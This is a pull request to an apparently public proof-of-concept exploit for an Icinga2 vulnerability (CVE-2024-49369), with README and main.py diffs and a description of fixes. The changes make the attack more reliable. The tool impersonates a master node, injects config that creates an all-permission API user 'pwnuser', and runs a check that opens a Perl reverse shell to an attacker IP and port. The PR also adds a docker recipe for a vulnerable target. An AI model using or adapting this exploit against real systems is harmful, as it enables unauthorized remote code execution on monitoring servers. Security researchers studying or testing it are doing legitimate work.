### PR TITLE
Fix exploit script and documentation

### DIFF
--- a/README.md
+++ b/README.md
@@ -44,16 +44,18 @@ We can see this node is vulnerable to the attack as the warning for clusters is 
 
 2. Launch the exploit:
    ```bash
-   python3 main.py exploit --host 192.168.0.5 --cn icinga_master --revip 192.168.0.1 --revport 9001
+   python3 main.py exploit --host 192.168.0.5 --node-cn icinga_master --zone master --revip 192.168.0.1 --revport 9001
    ```
    - **`--host`**: Target agent's IP address.
-   - **`--cn`**: Common Name of the Master/Satellite to impersonate.
+   - **`--node-cn`**: Common name of the Master/Satellite to impersonate.
+   - **`--zone`**: Targeted zone name. Default is `master`.
    - **`--revip`**: Attacker's IP address for reverse shell.
    - **`--revport`**: Attacker's port for reverse shell.
 
 This command initiates repeated connection attempts. Once the target agent disconnects from its current parent, the tool takes over, sending and receiving checks.
 
 #### Example Payload
+
 A Perl-based reverse shell is used as part of a new check created by the tool.
 
 ---
@@ -112,7 +114,7 @@ docker build -f Dockerfile -t icinga-exploit .
 ```
 ## Run Exploit
 ```
-docker run -it icinga-exploit exploit --host my_icinga_agent_with_satellite --revip 192.168.0.1 --revport 9001 --node-cn my_satellite
+docker run -it icinga-exploit exploit --host my_icinga_agent_with_satellite --revip 192.168.0.1 --revport 9001 --node-cn my_satellite --zone master
 ...+...+.......+......+.....+...+.......+............+..+...+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*.....+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*........+......+.+...............+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 .+.....+...+.+.....+...+.+...........+....+.........+...+........+.+......+...+............+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*.........+............+.....+....+.....+.........+.+.........+...+........+....+.................+....+......+...........+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*.....+....+..+.......+......+...........+...+...+...+.+......+..+...+...+....+...+...............+.....+...+.+......+............+..+....+.....+......+...+............+....+.........+.....+.+..+....+...+.................+.+...+.....+.......+..+...+...+....+.................+......+....+...+............+......+..................+.....+.........+.+..+....+......+..............+....+.........+...............+..+....+.........+..................+..+.............+............+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 -----
@@ -211,6 +213,16 @@ whoami
 icinga
 sh-4.4$ 
 ```
+
+### Local Icinga master for testing
+
+````
+# run the vulnerable master node
+docker run --rm --hostname icinga_master --name icinga_master -p 5665:5665 -e ICINGA_MASTER=1 -e ICINGA_ACCEPT_CONFIG=1 -e ICINGA_ACCEPT_COMMANDS=1 icinga/icinga2:2.14.2
+
+# exploit it
+python3 main.py exploit --host 127.0.0.1 --node-cn icinga_master --zone master --revip <IP> --revport <PORT>
+````
 
 ### Local Icinga agent for testing
 

--- a/main.py
+++ b/main.py
@@ -390,7 +390,7 @@ async def send_pki_update(node_cn, our_ca, our_ca_key, our_ca_text, conn):
     }
     await _write_netstring_pyopenssl(conn, message)
 
-async def exploit_host(host, revip, revport, port=5665, node_cn="icinga-master"):
+async def exploit_host(host, revip, revport, port=5665, node_cn="icinga-master", zone="master"):
     certfile = "fake-node.crt"
     keyfile = "fake-node.key"
     generate_self_signed_cert(certfile, keyfile, node_cn)
@@ -468,16 +468,16 @@ async def exploit_host(host, revip, revport, port=5665, node_cn="icinga-master")
 
                                 # Send update command to enable API
                                 updates = {
-                                    "/etc/icinga2/conf.d/api-users.conf": "object ApiUser \"root\" {permissions = [ \"*\" ]\npassword = \"icinga\"}",
+                                    "/etc/icinga2/conf.d/api-users.conf": "object ApiUser \"pwnuser\" {permissions = [ \"*\" ]\npassword = \"icinga\"}",
                                     "/etc/icinga2/conf.d/commands.conf": object,
-                                    "/etc/icinga2/conf.d/hosts.conf": "object Host \"localhost\" {address = \"127.0.0.1\"\ncheck_command = \"icinga_exploit\"\n}",
-                                    "/etc/icinga2/conf.d/services.conf": "object Service \"icinga_exploit\" {host_name = \"localhost\"\ncheck_command = \"icinga_exploit\"\ncheck_interval = 30m\nretry_interval = 15s\n}"
+                                    "/etc/icinga2/conf.d/hosts.conf": "object Host \"localhost-pwn\" {address = \"127.0.0.1\"\ncheck_command = \"icinga_exploit\"\n}",
+                                    "/etc/icinga2/conf.d/services.conf": "object Service \"icinga_exploit\" {host_name = \"localhost-pwn\"\ncheck_command = \"icinga_exploit\"\ncheck_interval = 30m\nretry_interval = 15s\n}"
                                 }
 
                                 jsonrpc_request = {
                                     "jsonrpc": "2.0",
                                     "method": "config::Update",
-                                    "params": {"update": {endpoint_cn: updates}},
+                                    "params": {"update": {zone: updates}},
                                 }
                                 logging.info("Sending config update")
                                 await _write_netstring_pyopenssl(conn, jsonrpc_request) 
@@ -514,10 +514,11 @@ def scan(subnet, csv, vuln, port, batch):
 @click.option("--host", prompt="Host to exploit")
 @click.option("--port", default=5665, help="Icinga port")
 @click.option("--node-cn", default="icinga-master", help="Node CN to impersonate")
+@click.option("--zone", default="master", help="Zone to target")
 @click.option("--revip", prompt="Reverse shell IP")
 @click.option("--revport", prompt="Reverse shell port")
-def exploit(host, port, node_cn, revip, revport):
-    asyncio.run(exploit_host(host, port=port, node_cn=node_cn, revip=revip, revport=revport))
+def exploit(host, port, node_cn, revip, revport, zone):
+    asyncio.run(exploit_host(host, port=port, node_cn=node_cn, revip=revip, revport=revport, zone=zone))
 
 
 if __name__ == "__main__":


### PR DESCRIPTION
Hi @Quantum-Sicarius,

first of all, many thanks for providing this brilliant poc script.

During local testing against some icinga master nodes, run in docker, I've noted the following problems:

- The default configuration of icinga2 master nodes uses the username `root` and hostname `localhost`.
  - The exploit poc script uses the same username and hostname to update the configuration during exploitation attempt. This bricks on the icigna master node and throws an error, as the same object cannot be updated. If we adjust the username and hostname to overwrite, the exploit works and is more reliable against default configurations.

````
[2025-08-20 16:33:19 +0000] critical/config: Error: Object 'root' of type 'ApiUser' re-defined: in /var/lib/icinga2/api/zones-stage//master/etc/icinga2/conf.d/api-users.conf: 1:0-1:20; previous definition: in /etc/icinga2/conf.d/api-users.conf: 4:1-4:21
Location: in /var/lib/icinga2/api/zones-stage//master/etc/icinga2/conf.d/api-users.conf: 1:0-1:20
/var/lib/icinga2/api/zones-stage//master/etc/icinga2/conf.d/api-users.conf(1): object ApiUser "root" {permissions = [ "*" ]
                                                                               ^^^^^^^^^^^^^^^^^^^^^
/var/lib/icinga2/api/zones-stage//master/etc/icinga2/conf.d/api-users.conf(2): password = "icinga"}
````

````
[2025-08-20 16:35:24 +0000] critical/config: Error: Object 'localhost' of type 'Host' re-defined: in /var/lib/icinga2/api/zones-stage//master/etc/icinga2/conf.d/hosts.conf: 1:0-1:22; previous definition: in /etc/icinga2/conf.d/hosts.conf: 1:0-1:22
Location: in /var/lib/icinga2/api/zones-stage//master/etc/icinga2/conf.d/hosts.conf: 1:0-1:22
/var/lib/icinga2/api/zones-stage//master/etc/icinga2/conf.d/hosts.conf(1): object Host "localhost" {address = "127.0.0.1"
                                                                           ^^^^^^^^^^^^^^^^^^^^^^^
/var/lib/icinga2/api/zones-stage//master/etc/icinga2/conf.d/hosts.conf(2): check_command = "icinga_exploit"
/var/lib/icinga2/api/zones-stage//master/etc/icinga2/conf.d/hosts.conf(3): }
````

- The readme defines the `--cn` cli parameter. However, the script only supports `--node-cn`. Fixed it.
- The poc script assumes that the node common name is the same as the zone during configuration updates.
  - During my local testing in docker, I noticed that the common name can be anything. Either defined by the server admin or in case one runs the basic docker image, it may be a random hostname. The common name is not the same as the zone name though. The script just uses `endpoint_cn` for both. Problematic regarding the zone [here](https://github.com/Quantum-Sicarius/CVE-2024-49369/blob/main/main.py#L480). I've introduced a new cli parameter `--zone` in case one has to define a different value. The default one is `master` (verified by running the default master node).

I've also added a simple poc example to run a icinga2 master node. Uses the official docker image by icinga2 and can be reliably exploited using my changes from this PR.